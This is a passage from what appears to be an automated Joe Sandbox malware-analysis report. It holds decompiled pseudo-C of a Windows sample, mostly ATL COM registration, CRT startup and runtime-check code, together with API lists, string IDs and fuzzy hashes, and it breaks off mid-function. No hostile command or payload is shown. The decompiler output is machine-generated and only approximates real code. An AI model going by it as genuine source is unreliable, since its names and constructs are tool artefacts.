                      				_t52 = E00943F80(_t83, _t106, _v12, _t98);
                      				_t113 = _t112 + 8;
                      				_v40 = _t52;
                      				while(_v40 != 0) {
                      					_t71 = E00944020(_t106, _v40, "UnregServer");
                      					_t113 = _t113 + 8;
                      					if(_t71 != 0) {
                      						_t98 = _v40;
                      						_t72 = E00944020(_t106, _t98, "RegServer");
                      						_t113 = _t113 + 8;
                      						__eflags = _t72;
                      						if(_t72 != 0) {
                      							_t83 = _v40;
                      							_t52 = E00943F80(_v40, _t106, _v40,  &_v32);
                      							_t113 = _t113 + 8;
                      							_v40 = _t52;
                      							continue;
                      						}
                      						_v20 = E0094D160(_v8);
                      						__eflags = _v20;
                      						if(__eflags >= 0) {
                      							_v20 = E0094D200(_t78, _v8, _t106, __eflags, 1, 0);
                      						}
                      						_t54 = 0;
                      						goto L28;
                      					} else {
                      						_v20 = E0094D190(_t78, _v8, _t106, 1, 0);
                      						if(_v20 >= 0) {
                      							_v20 = E0094D130(_v8);
                      						}
                      						_t54 = 0;
                      						L28:
                      						_push(_t98);
                      						E009D14C0(_t110, 0x94cdd4);
                      						_t56 = _t54;
                      						return E009D1520(_t56, _t110 - _t113 + 0x54);
                      					}
                      				}
                      				__eflags = _v24;
                      				if(_v24 == 0) {
                      					L27:
                      					__imp__CoUninitialize();
                      					__eflags = _t113 - _t113;
                      					E009D1520(_t52, _t113 - _t113);
                      					_t54 = _v16;
                      					goto L28;
                      				}
                      				__eflags =  *0xb336b8;
                      				if(__eflags != 0) {
                      					_t70 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a0, 0, "%ls", 0);
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t70 - 1;
                      					if(_t70 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t58 = E00957950(_t83, 0x2c);
                      				_t113 = _t113 + 4;
                      				_v84 = _t58;
                      				__eflags = _v84;
                      				if(__eflags == 0) {
                      					_v88 = 0;
                      				} else {
                      					_v88 = E009D1350(_v84, __eflags);
                      				}
                      				_v80 = _v88;
                      				 *0xb336b8 = _v80;
                      				E0094DD40(_t78,  *0xb336b8, _t106, 0, 0);
                      				E0094C410( *0xb336b8 + 4, _t106, 1);
                      				__eflags =  *0xb336b8;
                      				if(__eflags == 0) {
                      					_t68 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a4, 0, "%ls", 0);
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t68 - 1;
                      					if(__eflags == 0) {
                      						asm("int3");
                      					}
                      				}
                      				_v20 = L0094CF20(_v8, _t106, __eflags, 4, 1);
                      				__eflags = _v20;
                      				if(__eflags < 0) {
                      					_t67 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a8, 0, "%ls", L"SUCCEEDED(res)");
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t67 - 1;
                      					if(_t67 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				while(1) {
                      					_t108 = _t113;
                      					_t63 = GetMessageA( &_v72, 0, 0, 0);
                      					__eflags = _t113 - _t113;
                      					__eflags = E009D1520(_t63, _t113 - _t113);
                      					if(__eflags == 0) {
                      						break;
                      					}
                      					_t98 =  &_v72;
                      					_t65 = DispatchMessageA(_t98);
                      					__eflags = _t113 - _t113;
                      					E009D1520(_t65, _t113 - _t113);
                      				}
                      				_t52 = E0094CEF0(_v8, _t108, __eflags);
                      				goto L27;
                      			}

                      APIs
                      • GetCommandLineA.KERNEL32 ref: 0094CB7E
                      • CoInitialize.OLE32(00000000), ref: 0094CB92
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FC8
                      • new.LIBCMTD ref: 0094CCAA
                      • GetMessageA.USER32 ref: 0094CD70
                      • DispatchMessageA.USER32 ref: 0094CD87
                      • CoUninitialize.OLE32 ref: 0094CDA0
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094CDBA
                        • Part of subcall function 00944020: CharUpperA.USER32 ref: 0094403E
                        • Part of subcall function 00944020: CharUpperA.USER32(00000000), ref: 00944057
                        • Part of subcall function 00944020: CharNextA.USER32(CCCCCCCC), ref: 00944097
                        • Part of subcall function 00944020: CharNextA.USER32(?), ref: 009440AD
                        • Part of subcall function 00944020: CharUpperA.USER32(00000000), ref: 009440C6
                        • Part of subcall function 00944020: CharUpperA.USER32 ref: 009440DF
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FDD
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Char$Next$Upper$Message$CheckCommandDispatchInitializeLineStackUninitializeVars@8
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\Atlduck.cpp$RegServer$SUCCEEDED(res)$UnregServer
                      • API String ID: 1965964818-240722375
                      • Opcode ID: 84c71858edca935d2dfa72b31fcfdde07a84590133674d85f9cc9f4fbffeb145
                      • Instruction ID: 61ab176a230b7c2360cdf90a6e693081b92552e6961b78a550082328e28fb366
                      • Opcode Fuzzy Hash: 84c71858edca935d2dfa72b31fcfdde07a84590133674d85f9cc9f4fbffeb145
                      • Instruction Fuzzy Hash: CF61EFB2E41208AFDB10EBA0DC47FAE7774AF84705F104529E605BB2C1EBB56A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 126 957330-957358 InitializeCriticalSectionAndSpinCount GetModuleHandleW 127 957368-95736c 126->127 128 95735a-957365 GetModuleHandleW 126->128 129 957375-95739d GetProcAddress * 2 127->129 130 95736e-957370 call 958a40 127->130 128->127 132 95739f-9573a3 129->132 133 9573b8-9573d2 CreateEventW 129->133 130->129 132->133 134 9573a5-9573b6 132->134 135 9573d4-9573d6 call 958a40 133->135 136 9573db-9573de 133->136 134->136 135->136
                      C-Code - Quality: 100%
                      			E00957330(void* __edx) {
                      				struct HINSTANCE__* _v8;
                      				_Unknown_base(*)()* _v12;
                      				_Unknown_base(*)()* _v16;
                      				struct HINSTANCE__* _t14;
                      				void* _t18;
                      				intOrPtr _t20;
                      				void* _t23;
                      				void* _t25;
                      				void* _t27;
                      				void* _t28;
                      
                      				_t25 = __edx;
                      				InitializeCriticalSectionAndSpinCount(0xb30264, 0xfa0);
                      				_t14 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
                      				_v8 = _t14;
                      				if(_v8 == 0) {
                      					_v8 = GetModuleHandleW(L"kernel32.dll");
                      				}
                      				if(_v8 == 0) {
                      					E00958A40(_t23, _t25, _t27, _t28, 7);
                      				}
                      				_v12 = GetProcAddress(_v8, "SleepConditionVariableCS");
                      				_v16 = GetProcAddress(_v8, "WakeAllConditionVariable");
                      				if(_v12 != 0 && _v16 != 0) {
                      					 *0xb3027c = _v12;
                      					_t20 = _v16;
                      					 *0xb30280 = _t20;
                      					return _t20;
                      				}
                      				_t18 = CreateEventW(0, 1, 0, 0);
                      				 *0xb30260 = _t18;
                      				if( *0xb30260 == 0) {
                      					return E00958A40(_t23, _t25, _t27, _t28, 7);
                      				}
                      				return _t18;
                      			}

                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00B30264,00000FA0), ref: 00957340
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 0095734B
                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0095735F
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0095737E
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00957390
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 009573C0
                        • Part of subcall function 00958A40: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00958A4B
                        • Part of subcall function 00958A40: IsDebuggerPresent.KERNEL32 ref: 00958B1B
                        • Part of subcall function 00958A40: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958B47
                        • Part of subcall function 00958A40: UnhandledExceptionFilter.KERNEL32(00000007), ref: 00958B51
                      Strings
                      • SleepConditionVariableCS, xrefs: 00957375
                      • WakeAllConditionVariable, xrefs: 00957387
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00957346
                      • kernel32.dll, xrefs: 0095735A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressExceptionFilterHandleModulePresentProcUnhandled$CountCreateCriticalDebuggerEventFeatureInitializeProcessorSectionSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 839355944-3242537097
                      • Opcode ID: 5415731755358aa063dfa236c02cedc108d6bb928bde2c79f5834b54736c9cef
                      • Instruction ID: 09520ef6d0e59a1dd63a28e5ee607dd5f0ad7c613e34a42b0fb0fbf9f7e9c4fa
                      • Opcode Fuzzy Hash: 5415731755358aa063dfa236c02cedc108d6bb928bde2c79f5834b54736c9cef
                      • Instruction Fuzzy Hash: BE113A74D99308FFDB10EBE2FC0AB9EBB74AB44712F108196A80562291DBB45684EB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 138 958740-958768 call 958b80 call 99d790 call 9cf790 144 95876d-958770 138->144
                      C-Code - Quality: 100%
                      			E00958740() {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				void* _t8;
                      				void* _t9;
                      				void* _t12;
                      				void* _t13;
                      				void* _t14;
                      
                      				_v8 = E00958B80() & 0x0000ffff;
                      				_v12 = E0099D790();
                      				_t8 = E009CF790(_t9, _t12, _t13, _t14, 0x940000, 0, _v12, _v8); // executed
                      				return _t8;
                      			}


                      APIs
                      • ___scrt_get_show_window_mode.LIBCMTD ref: 00958746
                        • Part of subcall function 00958B80: GetStartupInfoW.KERNEL32(?), ref: 00958B9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: InfoStartup___scrt_get_show_window_mode
                      • String ID:
                      • API String ID: 2456344720-0
                      • Opcode ID: 6860b8a29db161c978de565dee3c8883977a8332e213aa63b9b162c19fa13815
                      • Instruction ID: f5436340a86646b1de10d9388ef4d054ed3f496f90c764d0c7b38cf670cbf594
                      • Opcode Fuzzy Hash: 6860b8a29db161c978de565dee3c8883977a8332e213aa63b9b162c19fa13815
                      • Instruction Fuzzy Hash: 5CD05EB9D05208BBCB00FBF89942F6EB7B99BC4716F104199B90CA7281D9305A1187E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E0094A960(void* __ebx, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
                      				signed int _v8;
                      				char _v16;
                      				signed int _v24;
                      				signed int* _v28;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				char _v48;
                      				char _v184;
                      				signed int _v192;
                      				char* _v200;
                      				intOrPtr _v208;
                      				int* _v212;
                      				char* _v216;
                      				char _v224;
                      				signed int _v232;
                      				char _v364;
                      				char _v384;
                      				char _v404;
                      				int _v416;
                      				signed int _v424;
                      				char* _v428;
                      				char* _v432;
                      				char* _v436;
                      				char* _v440;
                      				char* _v444;
                      				char* _v448;
                      				char* _v456;
                      				int** _v464;
                      				intOrPtr* _v468;
                      				int* _v472;
                      				int** _v476;
                      				char* _v480;
                      				char* _v484;
                      				char* _v488;
                      				char* _v492;
                      				int* _v496;
                      				int* _v500;
                      				void* _v508;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t175;
                      				signed int _t179;
                      				void* _t180;
                      				char* _t184;
                      				void* _t186;
                      				signed int _t189;
                      				signed int _t196;
                      				long _t221;
                      				long _t227;
                      				signed char _t231;
                      				void* _t238;
                      				signed int _t239;
                      				void* _t243;
                      				void* _t245;
                      				void* _t249;
                      				void* _t255;
                      				void* _t259;
                      				void* _t263;
                      				void* _t269;
                      				int* _t333;
                      				void* _t335;
                      				void* _t351;
                      				void* _t352;
                      				signed int _t354;
                      				void* _t355;
                      				void* _t356;
                      				int* _t357;
                      				int* _t362;
                      				int* _t365;
                      
                      				_t269 = __ebx;
                      				_t351 =  &_v500;
                      				memset(_t351, 0xcccccccc, 0x7c << 2);
                      				_t356 = _t355 + 0xc;
                      				_t352 = _t351 + 0x7c;
                      				_t175 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t175 ^ _t354;
                      				_v456 = 0;
                      				E0094DE60( &_v16);
                      				_t368 = _a8;
                      				if(_a8 != 0) {
                      					_t179 = E00941620( &_v16, _a4, 0x9d6390);
                      					_t357 = _t356 + 8;
                      					__eflags = _t179;
                      					if(_t179 == 0) {
                      						_t180 = E0094DEE0( &_v16);
                      						_t353 = _t357;
                      						__imp__CoCreateInstance(0x9d7cd0, 0, 1, 0xa002a0, _t180);
                      						__eflags = _t357 - _t357;
                      						_v24 = E009D1520(_t180, _t357 - _t357);
                      						__eflags = _v24;
                      						if(__eflags >= 0) {
                      							_v24 = 0;
                      							_v28 = _a8;
                      							while(1) {
                      								__eflags =  *_v28;
                      								if( *_v28 == 0) {
                      									break;
                      								}
                      								_t239 = _v28[1];
                      								_v48 =  *_t239;
                      								_v44 =  *((intOrPtr*)(_t239 + 4));
                      								_v40 =  *((intOrPtr*)(_t239 + 8));
                      								_v36 =  *((intOrPtr*)(_t239 + 0xc));
                      								__eflags = _a12;
                      								if(_a12 == 0) {
                      									__eflags =  *_v28 - 1;
                      									if( *_v28 != 1) {
                      										__eflags =  *_v28 - 2;
                      										if(__eflags != 0) {
                      											_t245 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c5e, 0, "%ls", L"pEntry->iType == 2");
                      											_t357 = _t357 + 0x18;
                      											__eflags = _t245 - 1;
                      											if(_t245 == 1) {
                      												asm("int3");
                      											}
                      										}
                      										_v476 = E0094DE90( &_v16);
                      										_t353 = _t357;
                      										_t333 =  *_v476;
                      										_t243 =  *(_t333[8])(_v476, _a4, 1,  &_v48);
                      										__eflags = _t357 - _t357;
                      										E009D1520(_t243, _t357 - _t357);
                      									} else {
                      										_v472 = E0094DE90( &_v16);
                      										_t353 = _t357;
                      										_t333 = _v472;
                      										_t249 =  *((intOrPtr*)( *((intOrPtr*)( *_t333 + 0x18))))(_v472, _a4, 1,  &_v48);
                      										__eflags = _t357 - _t357;
                      										E009D1520(_t249, _t357 - _t357);
                      									}
                      									L27:
                      									_v28 =  &(_v28[2]);
                      									continue;
                      								}
                      								__eflags =  *_v28 - 1;
                      								if( *_v28 != 1) {
                      									__eflags =  *_v28 - 2;
                      									if(__eflags != 0) {
                      										_t259 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c4d, 0, "%ls", L"pEntry->iType == 2");
                      										_t357 = _t357 + 0x18;
                      										__eflags = _t259 - 1;
                      										if(_t259 == 1) {
                      											asm("int3");
                      										}
                      									}
                      									_v468 = E0094DE90( &_v16);
                      									_t353 = _t357;
                      									_t333 =  *( *_v468 + 0x1c);
                      									_t255 =  *_t333(_v468, _a4, 1,  &_v48);
                      									__eflags = _t357 - _t357;
                      									_v24 = E009D1520(_t255, _t357 - _t357);
                      								} else {
                      									_v464 = E0094DE90( &_v16);
                      									_t353 = _t357;
                      									_t333 =  *_v464;
                      									_t263 =  *(_t333[5])(_v464, _a4, 1,  &_v48);
                      									__eflags = _t357 - _t357;
                      									_v24 = E009D1520(_t263, _t357 - _t357);
                      								}
                      								__eflags = _v24;
                      								if(__eflags >= 0) {
                      									goto L27;
                      								} else {
                      									_v440 = _v24;
                      									E0094B190( &_v16, __eflags);
                      									_t184 = _v440;
                      									goto L60;
                      								}
                      							}
                      							__eflags = _a12;
                      							if(__eflags != 0) {
                      								L59:
                      								_v448 = 0;
                      								E0094B190( &_v16, __eflags);
                      								_t184 = _v448;
                      								goto L60;
                      							} else {
                      								goto L29;
                      							}
                      							while(1) {
                      								L29:
                      								_t353 = _t357;
                      								_t333 =  &_v184;
                      								__imp__StringFromGUID2(_a4, _t333, 0x40);
                      								__eflags = _t357 - _t357;
                      								_t189 = E009D1520(_a4, _t357 - _t357);
                      								__eflags = _t189;
                      								if(_t189 == 0) {
                      									_v480 = 0;
                      								} else {
                      									_v480 = 1;
                      								}
                      								_v192 = _v480;
                      								__eflags = _v192;
                      								if(__eflags == 0) {
                      									_t238 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c69, 0, "%ls", L"__atl_condVal");
                      									_t357 = _t357 + 0x18;
                      									__eflags = _t238 - 1;
                      									if(_t238 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v192;
                      								if(__eflags == 0) {
                      									break;
                      								}
                      								__eflags = 0;
                      								if(0 != 0) {
                      									continue;
                      								}
                      								_v200 = 0;
                      								_v208 = E00941AB0();
                      								_v212 = 0;
                      								_v216 = 0;
                      								E0094F2E0( &_v224);
                      								_v212 =  &_v184;
                      								__eflags = _v212;
                      								if(__eflags != 0) {
                      									_t333 = _v212;
                      									_v200 = E00995A70(_t333) + 1;
                      									_t196 = E00941780(_t333, _t353, __eflags,  &_v200, _v200, 2);
                      									_t357 = _t357 + 0x10;
                      									__eflags = _t196;
                      									if(_t196 >= 0) {
                      										__eflags = _v200 - 0x400;
                      										if(__eflags > 0) {
                      											L45:
                      											_v500 = E0094F270(_t269,  &_v224, __eflags, _v200);
                      											L46:
                      											_t333 = _v500;
                      											_v488 = E00941BB0(_v212, _t353, _t333, _v212, _v200, _v208);
                      											L47:
                      											_v484 = _v488;
                      											L48:
                      											_v232 = _v484;
                      											__eflags = _v232;
                      											if(__eflags != 0) {
                      												E009426C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
                      												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, _v232);
                      												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Required Categories");
                      												_t362 = _t357 + 0x24;
                      												E009441F0( &_v384, 0x80000000);
                      												E009441C0( &_v404, 0);
                      												_v416 = 0;
                      												_v424 = E009445F0( &_v404, _t353, E00944250( &_v384),  &_v364, 0x20019);
                      												__eflags = _v424;
                      												if(__eflags == 0) {
                      													_t353 = _t362;
                      													_t227 = RegQueryInfoKeyA(E00944250( &_v404), 0, 0, 0,  &_v416, 0, 0, 0, 0, 0, 0, 0);
                      													__eflags = _t362 - _t362;
                      													_v424 = E009D1520(_t227, _t362 - _t362);
                      													E00944420( &_v404, _t362);
                      													__eflags = _v424;
                      													if(__eflags == 0) {
                      														__eflags = _v416;
                      														if(__eflags == 0) {
                      															E00944310( &_v384, _t353,  &_v364);
                      														}
                      													}
                      												}
                      												E009426C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
                      												_t333 =  &_v364;
                      												E00942780(_t269, _t352, _t353, __eflags, _t333, 0x80, _v232);
                      												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Implemented Categories");
                      												_t365 = _t362 + 0x24;
                      												_v424 = E009445F0( &_v404, _t353, E00944250( &_v384),  &_v364, 0x20019);
                      												__eflags = _v424;
                      												if(__eflags == 0) {
                      													_t353 = _t365;
                      													_t333 =  &_v416;
                      													_t221 = RegQueryInfoKeyA(E00944250( &_v404), 0, 0, 0, _t333, 0, 0, 0, 0, 0, 0, 0);
                      													__eflags = _t365 - _t365;
                      													_v424 = E009D1520(_t221, _t365 - _t365);
                      													E00944420( &_v404, _t365);
                      													__eflags = _v424;
                      													if(__eflags == 0) {
                      														__eflags = _v416;
                      														if(__eflags == 0) {
                      															E00944310( &_v384, _t353,  &_v364);
                      														}
                      													}
                      												}
                      												E00944220( &_v404, __eflags);
                      												E00944220( &_v384, __eflags);
                      											}
                      											E0094F220( &_v224);
                      											goto L59;
                      										}
                      										_t231 = E00941900(__eflags, _v200);
                      										_t357 = _t357 + 4;
                      										__eflags = _t231 & 0x000000ff;
                      										if(__eflags == 0) {
                      											goto L45;
                      										}
                      										_v492 =  &(_v200[0x24]);
                      										E009CF1D0(_v492);
                      										_v496 = _t357;
                      										E009D13A0(_v496, _v492,  &_v456);
                      										_v496 =  &(_v496[8]);
                      										_v500 = _v496;
                      										goto L46;
                      									}
                      									_v488 = 0;
                      									goto L47;
                      								}
                      								_v484 = 0;
                      								goto L48;
                      							}
                      							_v444 = 0xd;
                      							E0094B190( &_v16, __eflags);
                      							_t184 = _v444;
                      						} else {
                      							_v436 = 0;
                      							E0094B190( &_v16, __eflags);
                      							_t184 = _v436;
                      						}
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							__eflags = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c2e, 0, "%ls", L"0 && \"Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects.\"") - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_v432 = 0;
                      						E0094B190( &_v16, __eflags);
                      						_t184 = _v432;
                      					}
                      					goto L60;
                      				} else {
                      					_v428 = 0;
                      					E0094B190( &_v16, _t368);
                      					_t184 = _v428;
                      					L60:
                      					E009D13E0(_t269, _t354, 0x94b0a0, _v456);
                      					_t186 = _t184;
                      					_t335 = _t333;
                      					return E00957280(_t186, _t269, _v8 ^ _t354, _t335, _t352, _t353);
                      				}
                      			}

                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module
                      • String ID: $%ls$0 && "Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects."$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CLSID\$\Implemented Categories$\Required Categories$__atl_condVal$pEntry->iType == 2
                      • API String ID: 193471262-2261637480
                      • Opcode ID: 4bf698b0ba7bb9dd17ad4d1e52d680f2214ae2abff5cec000cc0b40d3f0993bf
                      • Instruction ID: ed6a9629bb37acb8dea0a48933a0daf796113d4cfac0e1953b70c756e87fcb8f
                      • Opcode Fuzzy Hash: 4bf698b0ba7bb9dd17ad4d1e52d680f2214ae2abff5cec000cc0b40d3f0993bf
                      • Instruction Fuzzy Hash: A5123B71D402289FDB24EB54DC52FEEB3B5AF98704F1081D9E60967291DB70AE84CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E009D20D0(intOrPtr _a4, short* _a8, char _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                      				signed short _v8;
                      				long _v12;
                      				void* _v16;
                      				signed int _v20;
                      				void* _v24;
                      				void* _v28;
                      				char _v32;
                      				void* _v36;
                      				long _v40;
                      				char _v44;
                      				char _v48;
                      				char _v52;
                      				struct _MEMORY_BASIC_INFORMATION _v80;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t80;
                      				void* _t81;
                      				struct HINSTANCE__* _t83;
                      				void* _t135;
                      				void* _t139;
                      				signed int _t140;
                      				void* _t146;
                      				void* _t149;
                      				void* _t151;
                      				intOrPtr _t155;
                      				intOrPtr* _t156;
                      				void* _t174;
                      				intOrPtr _t181;
                      				intOrPtr* _t188;
                      				intOrPtr _t190;
                      				signed int _t192;
                      				signed int _t195;
                      				intOrPtr* _t204;
                      				void* _t212;
                      				void* _t214;
                      				intOrPtr* _t215;
                      				signed int _t228;
                      
                      				 *_a16 = 0;
                      				_t212 = _a4 - 1;
                      				 *_a8 = 0;
                      				if(VirtualQuery(_t212,  &_v80, 0x1c) == 0 || E009D24B0(_v80.AllocationBase, _a20, _a24) == 0) {
                      					L45:
                      					return 0;
                      				} else {
                      					_t80 = _v80.AllocationBase;
                      					if( *_t80 != 0x5a4d) {
                      						goto L45;
                      					} else {
                      						_t155 =  *((intOrPtr*)(_t80 + 0x3c));
                      						if(_t155 <= 0) {
                      							goto L45;
                      						} else {
                      							_t156 = _t155 + _t80;
                      							if( *_t156 != 0x4550) {
                      								goto L45;
                      							} else {
                      								_t214 = _t212 - _t80;
                      								_t195 =  *(_t156 + 6) & 0x0000ffff;
                      								_t190 = ( *(_t156 + 0x14) & 0x0000ffff) + 0x20;
                      								_t149 = 0;
                      								_t81 = 0;
                      								if(_t195 != 0) {
                      									_t188 = _t156 + _t190;
                      									do {
                      										_t190 =  *((intOrPtr*)(_t188 + 4));
                      										if(_t214 < _t190) {
                      											goto L9;
                      										} else {
                      											_t149 = _t214 - _t190;
                      											if(_t214 >=  *_t188) {
                      												goto L9;
                      											}
                      										}
                      										goto L10;
                      										L9:
                      										_t81 = _t81 + 1;
                      										_t188 = _t188 + 0x28;
                      									} while (_t81 < _t195);
                      								}
                      								L10:
                      								if(_t81 == _t195) {
                      									goto L45;
                      								} else {
                      									_v16 = _t81 + 1;
                      									if( *0xb337c9 != 0) {
                      										_t83 =  *0xb337c4;
                      										goto L16;
                      									} else {
                      										if( *0xb337c4 != 0) {
                      											goto L45;
                      										} else {
                      											_t83 = E009D1C50(_t149, _t190, _t195, _t214);
                      											 *0xb337c4 = _t83;
                      											if(_t83 == 0) {
